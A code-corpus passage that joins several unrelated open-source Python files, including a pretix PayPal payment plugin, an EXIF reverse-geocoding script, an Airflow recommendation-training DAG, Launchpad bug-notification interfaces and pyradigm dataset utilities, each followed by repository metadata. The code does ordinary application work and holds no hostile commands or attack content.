return self._create_payment(request, payment)
def _create_payment(self, request, payment):
try:
if payment.create():
if payment.state not in ('created', 'approved', 'pending'):
messages.error(request, _('We had trouble communicating with PayPal'))
logger.error('Invalid payment state: ' + str(payment))
return
request.session['payment_paypal_id'] = payment.id
request.session['payment_paypal_event'] = self.event.id
for link in payment.links:
if link.method == "REDIRECT" and link.rel == "approval_url":
return str(link.href)
else:
messages.error(request, _('We had trouble communicating with PayPal'))
logger.error('Error on creating payment: ' + str(payment.error))
except Exception as e:
messages.error(request, _('We had trouble communicating with PayPal'))
logger.error('Error on creating payment: ' + str(e))
def checkout_confirm_render(self, request) -> str:
"""
Returns the HTML that should be displayed when the user selected this provider
on the 'confirm order' page.
"""
template = get_template('pretixplugins/paypal/checkout_payment_confirm.html')
ctx = {'request': request, 'event': self.event, 'settings': self.settings}
return template.render(ctx)
def payment_perform(self, request, order) -> str:
"""
Will be called if the user submitted his order successfully to initiate the
payment process.
        It should return a custom redirect URL, if you need special behaviour, or None to
continue with default behaviour.
On errors, it should use Django's message framework to display an error message
to the user (or the normal form validation error messages).
:param order: The order object
"""
if (request.session.get('payment_paypal_id', '') == ''
or request.session.get('payment_paypal_payer', '') == ''):
messages.error(request, _('We were unable to process your payment. See below for details on how to '
'proceed.'))
self.init_api()
payment = paypalrestsdk.Payment.find(request.session.get('payment_paypal_id'))
if str(payment.transactions[0].amount.total) != str(order.total) or payment.transactions[0].amount.currency != \
self.event.currency:
messages.error(request, _('We were unable to process your payment. See below for details on how to '
'proceed.'))
logger.error('Value mismatch: Order %s vs payment %s' % (order.id, str(payment)))
return
return self._execute_payment(payment, request, order)
def _execute_payment(self, payment, request, order):
payment.execute({"payer_id": request.session.get('payment_paypal_payer')})
if payment.state == 'pending':
messages.warning(request, _('PayPal has not yet approved the payment. We will inform you as soon as the '
'payment completed.'))
order = order.clone()
order.payment_info = json.dumps(payment.to_dict())
order.save()
return
if payment.state != 'approved':
messages.error(request, _('We were unable to process your payment. See below for details on how to '
'proceed.'))
logger.error('Invalid state: %s' % str(payment))
return
try:
mark_order_paid(order, 'paypal', json.dumps(payment.to_dict()))
messages.success(request, _('We successfully received your payment. Thank you!'))
except Quota.QuotaExceededException as e:
messages.error(request, str(e))
return None
def order_pending_render(self, request, order) -> str:
retry = True
try:
if order.payment_info and json.loads(order.payment_info)['state'] != 'pending':
retry = False
except KeyError:
pass
template = get_template('pretixplugins/paypal/pending.html')
ctx = {'request': request, 'event': self.event, 'settings': self.settings,
'retry': retry, 'order': order}
return template.render(ctx)
def order_control_render(self, request, order) -> str:
if order.payment_info:
payment_info = json.loads(order.payment_info)
else:
payment_info = None
template = get_template('pretixplugins/paypal/control.html')
ctx = {'request': request, 'event': self.event, 'settings': self.settings,
'payment_info': payment_info, 'order': order}
return template.render(ctx)
def order_control_refund_render(self, order) -> str:
return '<div class="alert alert-info">%s</div>' % _('The money will be automatically refunded.')
def order_control_refund_perform(self, request, order) -> "bool|str":
self.init_api()
if order.payment_info:
payment_info = json.loads(order.payment_info)
else:
payment_info = None
if not payment_info:
order.mark_refunded()
messages.warning(request, _('We were unable to transfer the money back automatically. '
'Please get in touch with the customer and transfer it back manually.'))
return
        sale = None
        for res in payment_info['transactions'][0]['related_resources']:
            for k, v in res.items():
                if k == 'sale':
                    sale = paypalrestsdk.Sale.find(v['id'])
                    break
            if sale is not None:
                # the inner break only exits the dict loop; stop scanning
                # resources once the sale has been found
                break
refund = sale.refund({})
if not refund.success():
order.mark_refunded()
messages.warning(request, _('We were unable to transfer the money back automatically. '
'Please get in touch with the customer and transfer it back manually.'))
else:
sale = paypalrestsdk.Payment.find(payment_info['id'])
order = order.mark_refunded()
order.payment_info = json.dumps(sale.to_dict())
order.save()
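    # --- Hedged sketch (not part of the plugin): the PayPal REST calls
    # used across the methods above, reduced to their bare lifecycle.
    # All identifiers below are placeholders.
    #
    #   payment = paypalrestsdk.Payment({...})      # checkout_prepare
    #   payment.create()                            # -> approval_url redirect
    #   payment = paypalrestsdk.Payment.find(payment_id)
    #   payment.execute({'payer_id': payer_id})     # payment_perform
    #   sale = paypalrestsdk.Sale.find(sale_id)
    #   sale.refund({})                             # order_control_refund_perform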
| apache-2.0 | 7,816,629,109,855,938,000 | 40.016461 | 120 | 0.548008 | false | 4.595205 | false | false | false |
fg1/exif-revgeo | exif_revgeo/__init__.py | 1 | 4683 | #!/usr/bin/python
# -*- encoding: utf-8 -*-
"""
exif-revgeo
~~~~~~~~~~~
This utility reads the GPS coordinates from your photos, reverse geocode
them, and write the result to the appropriate EXIF city/country location
tags.
:copyright: (c) 2015 by fg1
:license: BSD, see LICENSE for more details
"""
from __future__ import print_function
import os
import json
import shlex
import logging
import argparse
import requests
import subprocess
__version__ = "0.1.0"
# IPTC tags used for the location
EXIF_IPTC_LOC = ['City', 'Country-PrimaryLocationName', 'Country-PrimaryLocationCode']
# Description of the webservice doing the reverse geocoding
REVERSE_GEOCODE_URL = 'http://127.0.0.1:8080/rg/%(lat)f/%(lng)f/0.01'
REVERSE_GEOCODE_TRANS = {u"city": u"City",
u"country": u"Country-PrimaryLocationName",
u"country_iso3166-3": u"Country-PrimaryLocationCode"}
# ----------------------------------------------------------------------------
# Helper functions
logging.basicConfig(format='%(asctime)-15s %(message)s')
log = logging.getLogger('exifloc')
def filter_keys(d, keys):
"""
Returns dict 'd' with only the keys specified in 'keys'
"""
return dict((k, v) for k, v in d.iteritems() if k in keys)
def exclude_keys(d, keys):
"""
Returns dict 'd' without the keys specified in 'keys'
"""
return dict((k, v) for k, v in d.iteritems() if k not in keys)
# ----------------------------------------------------------------------------
# Reverse geocoding
def reverse_geocode(lat, lng):
r = requests.get(REVERSE_GEOCODE_URL % {'lat': lat, 'lng': lng})
if r.status_code != 200:
return None
else:
return json.loads(r.text)
# ----------------------------------------------------------------------------
# EXIF read/write operations
def extract_exif_tags(exiftool_bin, path, rd_args):
if isinstance(path, basestring):
path = [path]
iptc_tags = ['-' + t for t in EXIF_IPTC_LOC]
data = subprocess.check_output([exiftool_bin] +
shlex.split(rd_args) +
shlex.split('-q -n -j -GPSLatitude -GPSLongitude') +
iptc_tags + path)
data = json.loads(data)
return data
def tag_location(exiftool_bin, wr_args, info, overwrite_tags, dry_run):
rg_loc = reverse_geocode(info['GPSLatitude'], info['GPSLongitude'])
    if rg_loc is None:
log.warn('Error getting info for %(SourceFile)s (%(GPSLatitude)f, %(GPSLongitude)f)', info)
return
# Adapts the returned object to the IPTC names
for k, v in REVERSE_GEOCODE_TRANS.iteritems():
if k not in rg_loc:
log.warn('Unable to find "' + k + '" in returned location: ' + str(rg_loc))
return
rg_loc[v] = rg_loc.pop(k)
rg_loc = filter_keys(rg_loc, EXIF_IPTC_LOC)
# Only add tags where they are missing
if not overwrite_tags:
exif_loc = filter_keys(info, EXIF_IPTC_LOC)
rg_loc = exclude_keys(rg_loc, exif_loc.keys())
if len(rg_loc) == 0:
return
# Build exiftool command
cmd = [exiftool_bin] + shlex.split(wr_args)
for k, v in rg_loc.iteritems():
        cmd.append('-' + k + '=' + v)
cmd.append(info['SourceFile'])
# Execute command
print("> " + ' '.join(cmd))
if dry_run:
return
subprocess.check_call(cmd)
# ----------------------------------------------------------------------------
# Main
def main(args):
tags = extract_exif_tags(args.exiftool_bin, args.path, args.rd_args)
# Keeps only the files where the latitude and longitude are set
tags = [t for t in tags if 'GPSLatitude' in t and 'GPSLongitude' in t]
for t in tags:
tag_location(args.exiftool_bin, args.wr_args, t, args.overwrite_tags, args.dry_run)
def cli():
parser = argparse.ArgumentParser(description='Add city and country in EXIF based on GPS coords')
parser.add_argument('--exiftool-bin', type=str, help='exiftool binary to use', default='exiftool')
parser.add_argument('--rd-args', type=str, help='exiftool read arguments', default='')
parser.add_argument('--wr-args', type=str, help='exiftool write arguments', default='-overwrite_original')
parser.add_argument('-o', '--overwrite-tags', action='store_true', help='Overwrite existing tag values')
parser.add_argument('path', type=str, help='files or folder to process')
parser.add_argument('-d', '--dry-run', action='store_true', help='Do not perform any file modification')
args = parser.parse_args()
main(args)
if __name__ == "__main__":
cli()
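# --- Illustrative note (assumption, not from the source): the reverse
# geocoding webservice at REVERSE_GEOCODE_URL is expected to return JSON
# roughly like
#
#   {"city": "Paris", "country": "France", "country_iso3166-3": "FRA"}
#
# which tag_location() renames via REVERSE_GEOCODE_TRANS into the IPTC
# keys City, Country-PrimaryLocationName and Country-PrimaryLocationCode
# before handing them to exiftool.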
| bsd-3-clause | 5,753,826,818,839,148,000 | 33.688889 | 110 | 0.585522 | false | 3.558511 | false | false | false |
felipegerard/arte_mexicano_antiguo | felipegerard/code/luigi/itm/build/lib/itm/text_extraction_functions.py | 12 | 3950 | # coding=utf-8
import os
import io
import sys
import logging
import shutil
try:
from cStringIO import StringIO
except:
from StringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
from nltk import wordpunct_tokenize
from nltk.corpus import stopwords
def obtener_rutas(rutaBase, extension='.pdf', blacklist=None):
if blacklist is None:
return [os.path.join(rutaBase,x) for x in os.listdir(rutaBase) if extension in x]
else:
return [os.path.join(rutaBase,x) for x in os.listdir(rutaBase) if (extension in x) and (x not in blacklist)]
def calcularValoresDeIdioma(contenido):
languages_ratios = {}
tokens = wordpunct_tokenize(contenido)
words = [word.lower() for word in tokens]
for language in stopwords.fileids():
stopwords_set = set(stopwords.words(language))
words_set = set(words)
common_elements = words_set.intersection(stopwords_set)
languages_ratios[language] = len(common_elements)
return languages_ratios
def detectarIdioma(contenido):
valores = calcularValoresDeIdioma(contenido)
idioma = max(valores, key=valores.get)
return idioma
def convertir(rutaVolumen, hojas=None):
if not hojas:
hojas = set()
else:
hojas = set(hojas)
output = StringIO()
manager = PDFResourceManager()
converter = TextConverter(manager, output, laparams=LAParams())
interpreter = PDFPageInterpreter(manager, converter)
infile = file(rutaVolumen, 'rb')
for hoja in PDFPage.get_pages(infile, hojas):
interpreter.process_page(hoja)
infile.close()
converter.close()
text = output.getvalue()
    output.close()
return text
def convertirVolumenes(rutaVolumenes):
txt = ""
for rutaVolumen in rutaVolumenes:
try:
txt += convertir(rutaVolumen)
except Exception:
logging.info("ERROR al convertir el volumen "+rutaVolumen)
print "ERROR al convertir el volumen "+rutaVolumen
return txt
def extraerVolumen(inputPDF):
print "---------------------------------"
print "Convirtiendo "+inputPDF.path
rutaVolumenes = obtener_rutas(inputPDF.path, '.pdf')
contenido = convertirVolumenes(rutaVolumenes)
idioma = detectarIdioma(contenido)
return idioma, contenido
# Save metadata
def guardarMetadatos(book_name,idioma,txt_dir,meta_file):
outfile = book_name
meta = os.path.join(txt_dir, meta_file)
flag = True
if os.path.exists(meta):
with open(meta, 'r') as f:
log = f.read()
if outfile in log:
flag = False
if flag:
with open(meta, 'a+') as f:
f.write(outfile + '\t'+ idioma + '\n')
def save_content(target_dir, book_name, content):
if not os.path.exists(target_dir):
os.makedirs(target_dir)
print '--------------------'
        print 'Creating folder ' + target_dir
    # Save content
book_path = os.path.join(target_dir,book_name+'.txt')
with open(book_path, 'w') as f:
f.write(content)
print book_name + ' --> ' + target_dir
def get_extracts(string, min_length=500, percentages=[0.1,0.5,0.9], max_start_offset=10, max_lines=20):
str_list = string.split('\n')
positions = [int(p*len(str_list)) for p in percentages]
extracts = []
for p in positions:
s = ''
for i in range(p, min(p + max_start_offset, len(str_list)-1), 1):
if len(str_list[i]) > 0 and str_list[i][0].isupper():
break
p = p + 1
for i in range(p, min(p + max_lines, len(str_list)-1), 1):
if len(s) >= min_length:
break
else:
s += '\n' + str_list[i]
extracts.append({'start_line':p, 'start_line_perc':round(1.0*p/len(str_list),3), 'text':s})
return extracts
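# --- Hedged usage sketch (not part of the original module): exercising
# get_extracts() on a toy multi-line string. Parameters are arbitrary.
if __name__ == '__main__':
    demo_text = '\n'.join('Line %d of the demo text.' % i for i in range(100))
    for ex in get_extracts(demo_text, min_length=40, max_lines=3):
        print ex['start_line'], ex['start_line_perc'], len(ex['text'])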
| agpl-3.0 | 6,755,058,549,600,436,000 | 29.384615 | 110 | 0.643544 | false | 3.188055 | false | false | false |
GoogleCloudPlatform/tensorflow-recommendation-wals | airflow/dags/training.py | 1 | 4688 | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""DAG definition for recserv model training."""
import airflow
from airflow import DAG
from airflow.contrib.operators.bigquery_operator import BigQueryOperator
from airflow.contrib.operators.bigquery_to_gcs import BigQueryToCloudStorageOperator
from airflow.hooks.base_hook import BaseHook
from airflow.operators.app_engine_admin_plugin import AppEngineVersionOperator
from airflow.operators.ml_engine_plugin import MLEngineTrainingOperator
import datetime
def _get_project_id():
"""Get project ID from default GCP connection."""
extras = BaseHook.get_connection('google_cloud_default').extra_dejson
key = 'extra__google_cloud_platform__project'
if key in extras:
project_id = extras[key]
else:
        raise ValueError('Must configure project_id in google_cloud_default '
                         'connection from Airflow Console')
return project_id
PROJECT_ID = _get_project_id()
# Data set constants, used in BigQuery tasks. You can change these
# to conform to your data.
DATASET = 'GA360_test'
TABLE_NAME = 'ga_sessions_sample'
ARTICLE_CUSTOM_DIMENSION = '10'
# GCS bucket names and region, can also be changed.
BUCKET = 'gs://recserve_' + PROJECT_ID
REGION = 'us-east1'
# The code package name comes from the model code in the wals_ml_engine
# directory of the solution code base.
PACKAGE_URI = BUCKET + '/code/wals_ml_engine-0.1.tar.gz'
JOB_DIR = BUCKET + '/jobs'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': airflow.utils.dates.days_ago(2),
'email': ['airflow@example.com'],
'email_on_failure': True,
'email_on_retry': False,
'retries': 5,
'retry_delay': datetime.timedelta(minutes=5)
}
# Default schedule interval using cronjob syntax - can be customized here
# or in the Airflow console.
schedule_interval = '00 21 * * *'
dag = DAG('recommendations_training_v1', default_args=default_args,
schedule_interval=schedule_interval)
dag.doc_md = __doc__
#
#
# Task Definition
#
#
# BigQuery training data query
bql='''
#legacySql
SELECT
fullVisitorId as clientId,
ArticleID as contentId,
(nextTime - hits.time) as timeOnPage,
FROM(
SELECT
fullVisitorId,
hits.time,
MAX(IF(hits.customDimensions.index={0},
hits.customDimensions.value,NULL)) WITHIN hits AS ArticleID,
LEAD(hits.time, 1) OVER (PARTITION BY fullVisitorId, visitNumber
ORDER BY hits.time ASC) as nextTime
FROM [{1}.{2}.{3}]
WHERE hits.type = "PAGE"
) HAVING timeOnPage is not null and contentId is not null;
'''
bql = bql.format(ARTICLE_CUSTOM_DIMENSION, PROJECT_ID, DATASET, TABLE_NAME)
t1 = BigQueryOperator(
task_id='bq_rec_training_data',
bql=bql,
destination_dataset_table='%s.recommendation_events' % DATASET,
write_disposition='WRITE_TRUNCATE',
dag=dag)
# BigQuery training data export to GCS
training_file = BUCKET + '/data/recommendation_events.csv'
t2 = BigQueryToCloudStorageOperator(
task_id='bq_export_op',
source_project_dataset_table='%s.recommendation_events' % DATASET,
destination_cloud_storage_uris=[training_file],
export_format='CSV',
dag=dag
)
# ML Engine training job
job_id = 'recserve_{0}'.format(datetime.datetime.now().strftime('%Y%m%d%H%M'))
job_dir = BUCKET + '/jobs/' + job_id
output_dir = BUCKET
training_args = ['--job-dir', job_dir,
'--train-file', training_file,
'--output-dir', output_dir,
'--data-type', 'web_views',
'--use-optimized']
t3 = MLEngineTrainingOperator(
task_id='ml_engine_training_op',
project_id=PROJECT_ID,
job_id=job_id,
package_uris=[PACKAGE_URI],
training_python_module='trainer.task',
training_args=training_args,
region=REGION,
scale_tier='CUSTOM',
master_type='complex_model_m_gpu',
dag=dag
)
# App Engine deploy new version
t4 = AppEngineVersionOperator(
task_id='app_engine_deploy_version',
project_id=PROJECT_ID,
service_id='default',
region=REGION,
service_spec=None,
dag=dag
)
t2.set_upstream(t1)
t3.set_upstream(t2)
t4.set_upstream(t3)
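# --- Hedged note (not part of the original DAG): the set_upstream calls
# above wire the pipeline as
#   bq_rec_training_data -> bq_export_op -> ml_engine_training_op
#   -> app_engine_deploy_version
# With Airflow's bitshift syntax the same chain could be written as:
#
#   t1 >> t2 >> t3 >> t4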
| apache-2.0 | 4,713,744,455,293,275,000 | 27.760736 | 84 | 0.700725 | false | 3.389732 | false | false | false |
abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/bugs/interfaces/bugnotification.py | 1 | 4408 | # Copyright 2009 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Bug notifications."""
__metaclass__ = type
__all__ = [
'IBugNotification',
'IBugNotificationFilter',
'IBugNotificationRecipient',
'IBugNotificationSet',
]
from lazr.restful.fields import Reference
from zope.interface import (
Attribute,
Interface,
)
from zope.schema import (
Bool,
Choice,
Datetime,
TextLine,
)
from lp import _
from lp.bugs.enums import BugNotificationStatus
from lp.bugs.interfaces.bugsubscriptionfilter import IBugSubscriptionFilter
from lp.registry.interfaces.role import IHasOwner
from lp.services.fields import BugField
class IBugNotification(IHasOwner):
"""A textual representation of bug changes."""
id = Attribute('id')
message = Attribute(
"The message containing the text representation of the changes"
" to the bug.")
activity = Attribute(
"The bug activity object corresponding to this notification. Will "
"be None for older notification objects, and will be None if the "
"bugchange object that provides the data for the change returns None "
"for getBugActivity.")
bug = BugField(title=u"The bug this notification is for.",
required=True)
is_comment = Bool(
title=u"Comment", description=u"Is the message a comment?",
required=True)
date_emailed = Datetime(
title=u"Date emailed",
description=u"When was the notification sent? None, if it hasn't"
" been sent yet.",
required=False)
recipients = Attribute(
"The people to which this notification should be sent.")
status = Choice(
title=_("Status"), required=True,
vocabulary=BugNotificationStatus,
default=BugNotificationStatus.PENDING,
description=_(
"The status of this bug notification."),
)
bug_filters = Attribute(
"List of bug filters that caused this notification.")
class IBugNotificationSet(Interface):
"""The set of bug notifications."""
def getNotificationsToSend():
"""Returns the notifications pending to be sent."""
def getDeferredNotifications():
"""Returns the deferred notifications.
        A deferred notification is one that is pending but has no recipients.
"""
def addNotification(self, bug, is_comment, message, recipients, activity):
"""Create a new `BugNotification`.
Create a new `BugNotification` object and the corresponding
`BugNotificationRecipient` objects.
"""
def getRecipientFilterData(bug, recipient_to_sources, notifications):
"""Get non-muted recipients mapped to sources & filter descriptions.
:param bug:
A bug we are collecting filter data for.
:param recipient_to_sources:
A dict of people who are to receive the email to the sources
(BugNotificationRecipients) that represent the subscriptions that
caused the notifications to be sent.
:param notifications: the notifications that are being communicated.
The dict of recipients may have fewer recipients than were
provided if those users muted all of the subscription filters
that caused them to be sent.
"""
class IBugNotificationRecipient(Interface):
"""A recipient of a bug notification."""
bug_notification = Attribute(
"The bug notification this recipient should receive.")
person = Attribute(
"The person to send the bug notification to.")
reason_header = TextLine(
title=_('Reason header'),
description=_("The value for the "
"`X-Launchpad-Message-Rationale` header."))
reason_body = TextLine(
title=_('Reason body'),
description=_("The reason for this notification."))
class IBugNotificationFilter(Interface):
"""`BugSubscriptionFilter` that generated a bug notification."""
bug_notification = Reference(
IBugNotification,
title=_("Bug notification"),
required=True, readonly=True)
bug_subscription_filter = Reference(
IBugSubscriptionFilter,
title=_("Bug subscription filter"),
required=True, readonly=True)
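# --- Hedged illustration (assumption, not part of Launchpad): a minimal
# sketch of a class declaring that it provides one of the interfaces
# above, using zope.interface's implementer decorator. The class and its
# attribute values are placeholders.
#
#   from zope.interface import implementer
#
#   @implementer(IBugNotificationRecipient)
#   class SimpleRecipient:
#       def __init__(self, bug_notification, person,
#                    reason_header, reason_body):
#           self.bug_notification = bug_notification
#           self.person = person
#           self.reason_header = reason_header
#           self.reason_body = reason_body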
| agpl-3.0 | 8,563,591,084,256,852,000 | 32.648855 | 78 | 0.661298 | false | 4.822757 | false | false | false |
raamana/pyradigm | pyradigm/utils.py | 1 | 13549 |
from collections import Iterable
import numpy as np
from pyradigm.base import missing_value_indicator
from pyradigm import ClassificationDataset, RegressionDataset
from pyradigm.pyradigm import MLDataset
feat_generator = np.random.randn
from pyradigm.base import is_iterable_but_not_str, BaseDataset
from warnings import warn
def load_dataset(ds_path):
"""Convenience utility to quickly load any type of pyradigm dataset"""
try:
ds = ClassificationDataset(dataset_path=ds_path)
except:
try:
ds = RegressionDataset(dataset_path=ds_path)
except:
try:
                warn('MLDataset is deprecated. Switch to the latest pyradigm data '
'structures such as ClassificationDataset or '
'RegressionDataset as soon as possible.')
ds = MLDataset(filepath=ds_path)
except:
raise TypeError('Dataset class @ path below not recognized!'
' Must be a valid instance of one of '
'ClassificationDataset or '
'RegressionDataset or MLDataset.\n'
' Ignoring {}'.format(ds_path))
return ds
def load_arff_dataset(ds_path):
"""Convenience utility to quickly load ARFF files into pyradigm format"""
try:
ds = ClassificationDataset.from_arff(ds_path)
except:
try:
ds = RegressionDataset.from_arff(ds_path)
except:
try:
ds = MLDataset(arff_path=ds_path)
except:
raise TypeError('Error in loading the ARFF dataset @ path below!'
' Ignoring {}'.format(ds_path))
return ds
def check_compatibility(datasets,
class_type,
reqd_num_features=None,
):
"""
Checks whether the given Dataset instances are compatible
    i.e., with the same set of subjects, each with the same target in all instances.
Checks the first dataset in the list against the rest, and returns a boolean array.
Parameters
----------
datasets : Iterable
A list of n datasets
class_type : class
Class of the datasets being compared e.g. ClassificationDataset or
RegressionDataset or [the deprecated] MLDataset.
All datasets being compared must be of the same class type.
reqd_num_features : int
The required number of features in each dataset.
Helpful to ensure test sets are compatible with training set,
as well as within themselves.
Returns
-------
all_are_compatible : bool
Boolean flag indicating whether all datasets are compatible or not
compatibility : list
List indicating whether first dataset is compatible with the rest individually.
This could be useful to select a subset of mutually compatible datasets.
Length : n-1
dim_mismatch : bool
Boolean flag indicating mismatch in dimensionality from that specified
size_descriptor : tuple
A tuple with values for (num_samplets, reqd_num_features)
- num_samplets must be common for all datasets that are evaluated for compatibility
        - reqd_num_features is None (when no check on dimensionality is performed), or
list of corresponding dimensionalities for each input dataset
"""
if not is_iterable_but_not_str(datasets):
raise TypeError('Input must be an iterable '
'i.e. (list/tuple) of MLdataset/similar instances')
datasets = list(datasets) # to make it indexable if coming from a set
num_datasets = len(datasets)
check_dimensionality = False
dim_mismatch = False
if reqd_num_features is not None:
if isinstance(reqd_num_features, Iterable):
if len(reqd_num_features) != num_datasets:
raise ValueError(
'Specify dimensionality for exactly {} datasets.'
' Given for a different number {}'
''.format(num_datasets, len(reqd_num_features)))
reqd_num_features = list(map(int, reqd_num_features))
else: # same dimensionality for all
reqd_num_features = [int(reqd_num_features)] * num_datasets
check_dimensionality = True
else:
# to enable iteration
reqd_num_features = [None, ] * num_datasets
pivot = datasets[0]
if isinstance(pivot, str):
pivot = class_type(dataset_path=pivot)
elif not isinstance(pivot, BaseDataset):
raise TypeError('All datasets in pyradigm must be subclasses of '
'BaseDataset')
if check_dimensionality and pivot.num_features != reqd_num_features[0]:
warn('Dimensionality mismatch! Expected {} whereas current {}.'
''.format(reqd_num_features[0], pivot.num_features))
dim_mismatch = True
compatible = list()
for ds, reqd_dim in zip(datasets[1:], reqd_num_features[1:]):
if isinstance(ds, str):
ds = class_type(dataset_path=ds)
elif not isinstance(ds, BaseDataset):
raise TypeError('All datasets in pyradigm must be subclasses of '
'BaseDataset')
is_compatible = True
# compound bool will short-circuit, not optim required
if pivot.num_samplets != ds.num_samplets \
or pivot.samplet_ids != ds.samplet_ids \
or pivot.targets != ds.targets:
is_compatible = False
if check_dimensionality and reqd_dim != ds.num_features:
warn('Dimensionality mismatch! '
'Expected {} whereas current {}.'
''.format(reqd_dim, ds.num_features))
dim_mismatch = True
compatible.append(is_compatible)
return all(compatible), compatible, dim_mismatch, \
(pivot.num_samplets, reqd_num_features)
def attr_generator(attr_type, count):
"""Generates distributions of a given type"""
    if isinstance(attr_type, str):
        # lower-casing applies only to string type names; an iterable of
        # values to sample from is handled by the final branch below
        attr_type = attr_type.lower()
if attr_type in ('int', 'age'):
return np.random.randint(100, size=count)
elif attr_type in ('float', 'weight'):
return 100*np.abs(np.random.rand(count))
elif attr_type in ('sex', 'gender'):
return np.random.choice(['male', 'female', 'other'], count, replace=True)
elif attr_type in ('site', ):
return np.random.choice(['site{}'.format(ss) for ss in range(6)],
count, replace=True)
elif isinstance(attr_type, Iterable):
return np.random.choice(attr_type, count, replace=True)
else:
raise ValueError('Invalid type: must be int or float.'
' Or an array of values to sample from.'
' Type can also be age, sex, gender, weight, or site.')
def make_random_dataset(max_num_classes=20,
min_class_size=20,
max_class_size=50,
max_dim=100,
stratified=True,
with_missing_data=False,
class_type=ClassificationDataset,
min_num_classes=2,
attr_names=None,
attr_types=None):
"Generates a random Dataset for use in testing."
smallest = min(min_class_size, max_class_size)
max_class_size = max(min_class_size, max_class_size)
largest = max(50, max_class_size)
largest = max(smallest + 3, largest)
if min_num_classes < 2:
min_num_classes = 2
if max_num_classes <= min_num_classes:
        # np.random.randint(low, high) requires high > low
        max_num_classes = min_num_classes + 1
num_classes = np.random.randint(min_num_classes, max_num_classes, 1)
if type(num_classes) == np.ndarray:
num_classes = num_classes[0]
if not stratified:
class_sizes = np.random.randint(smallest, largest+1, num_classes)
else:
class_sizes = np.repeat(np.random.randint(smallest, largest), num_classes)
num_samplets = class_sizes.sum()
num_features = np.random.randint(min(3, max_dim), max(3, max_dim), 1)[0]
# feat_names = [ str(x) for x in range(num_features)]
class_ids = list()
labels = list()
for cl in range(num_classes):
if issubclass(class_type, RegressionDataset):
class_ids.append(cl)
else:
class_ids.append('class-{}'.format(cl))
labels.append(int(cl))
# attributes
if attr_names is not None:
if len(attr_names) != len(attr_types):
raise ValueError('Differing number of names and types for attributes!')
attrs = dict()
for name, typ in zip(attr_names, attr_types):
attrs[name] = attr_generator(typ, num_samplets)
ds = class_type()
s_index = 0
for cc, class_ in enumerate(class_ids):
subids = ['s{}-c{}'.format(ix, cc) for ix in range(class_sizes[cc])]
for sid in subids:
features = feat_generator(num_features)
if with_missing_data:
rand_loc = np.random.randint(num_features)
features[rand_loc] = missing_value_indicator
if isinstance(ds, MLDataset):
ds.add_sample(sid, features, int(cc), class_)
else:
if attr_names is not None:
a_values = [ attrs[a_name][s_index] for a_name in attr_names]
ds.add_samplet(sid, features, class_,
attr_names=attr_names, attr_values=a_values)
else:
ds.add_samplet(sid, features, class_)
s_index += 1
return ds
def make_random_ClfDataset(max_num_classes=20,
min_class_size=20,
max_class_size=50,
max_dim=100,
stratified=True,
min_num_classes=2,
attr_names=None,
attr_types=None
):
"Generates a random ClassificationDataset for use in testing."
return make_random_dataset(max_num_classes=max_num_classes,
min_class_size=min_class_size,
max_class_size=max_class_size,
max_dim=max_dim,
stratified=stratified,
class_type=ClassificationDataset,
min_num_classes=min_num_classes,
attr_names=attr_names, attr_types=attr_types)
def make_random_RegrDataset(min_size=20,
max_size=50,
max_dim=100,
with_missing_data=False,
attr_names=None,
attr_types=None
):
"Generates a random ClassificationDataset for use in testing."
smallest = min(min_size, max_size)
max_size = max(min_size, max_size)
largest = max(50, max_size)
largest = max(smallest + 3, largest)
sample_size = np.random.randint(smallest, largest+1)
num_features = np.random.randint(min(3, max_dim), max(3, max_dim), 1)[0]
# attributes
if attr_names is not None:
if len(attr_names) != len(attr_types):
raise ValueError('Differing number of names and types for attributes!')
attrs = dict()
for name, typ in zip(attr_names, attr_types):
attrs[name] = attr_generator(typ, sample_size)
ds = RegressionDataset()
subids = ['s{}'.format(ix) for ix in range(sample_size)]
for counter, sid in enumerate(subids):
features = feat_generator(num_features)
target = np.random.randint(sample_size)
if with_missing_data:
rand_loc = np.random.randint(num_features)
features[rand_loc] = missing_value_indicator
if attr_names is not None:
a_values = [attrs[a_name][counter] for a_name in attr_names]
ds.add_samplet(sid, features, target,
attr_names=attr_names, attr_values=a_values)
else:
ds.add_samplet(sid, features, target)
return ds
def make_random_MLdataset(max_num_classes=20,
min_class_size=20,
max_class_size=50,
max_dim=100,
stratified=True):
"Generates a random MLDataset for use in testing."
return make_random_dataset(max_num_classes=max_num_classes,
min_class_size=min_class_size,
max_class_size=max_class_size,
max_dim=max_dim,
stratified=stratified,
class_type=MLDataset)
def dataset_with_new_features_same_everything_else(in_ds, max_feat_dim):
"""Helper utility for MultiDataset purposes."""
feat_dim = np.random.randint(1, max_feat_dim)
out_ds = in_ds.__class__()
for id_ in in_ds.samplet_ids:
out_ds.add_samplet(id_,
np.random.rand(feat_dim),
target=in_ds.targets[id_])
# copying attr
out_ds.attr = in_ds.attr
out_ds.dataset_attr = in_ds.dataset_attr
out_ds.attr_dtype = in_ds.attr_dtype
return out_ds
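# --- Hedged usage sketch (not part of the original module): generating
# a random dataset, deriving a second one with fresh features but the
# same samplets/targets, and verifying them with check_compatibility().
if __name__ == '__main__':
    ds_one = make_random_ClfDataset(max_num_classes=4, stratified=True)
    ds_two = dataset_with_new_features_same_everything_else(ds_one, 20)
    all_ok, per_ds, dim_mismatch, sizes = check_compatibility(
            [ds_one, ds_two], class_type=ClassificationDataset)
    print('all compatible: {}'.format(all_ok))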
| mit | -7,985,475,627,983,962,000 | 36.531856 | 91 | 0.568529 | false | 4.206458 | true | false | false |
wangz/future | obtaindata/obtain_cffex.py | 1 | 5908 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#encoding=utf-8
# pip install BeautifulSoup MySQL-python
# from 20100416
import sys,re,urllib2,urllib,cookielib,chardet,time
from BeautifulSoup import BeautifulSoup,Comment
from datetime import *
import time,logging,MySQLdb
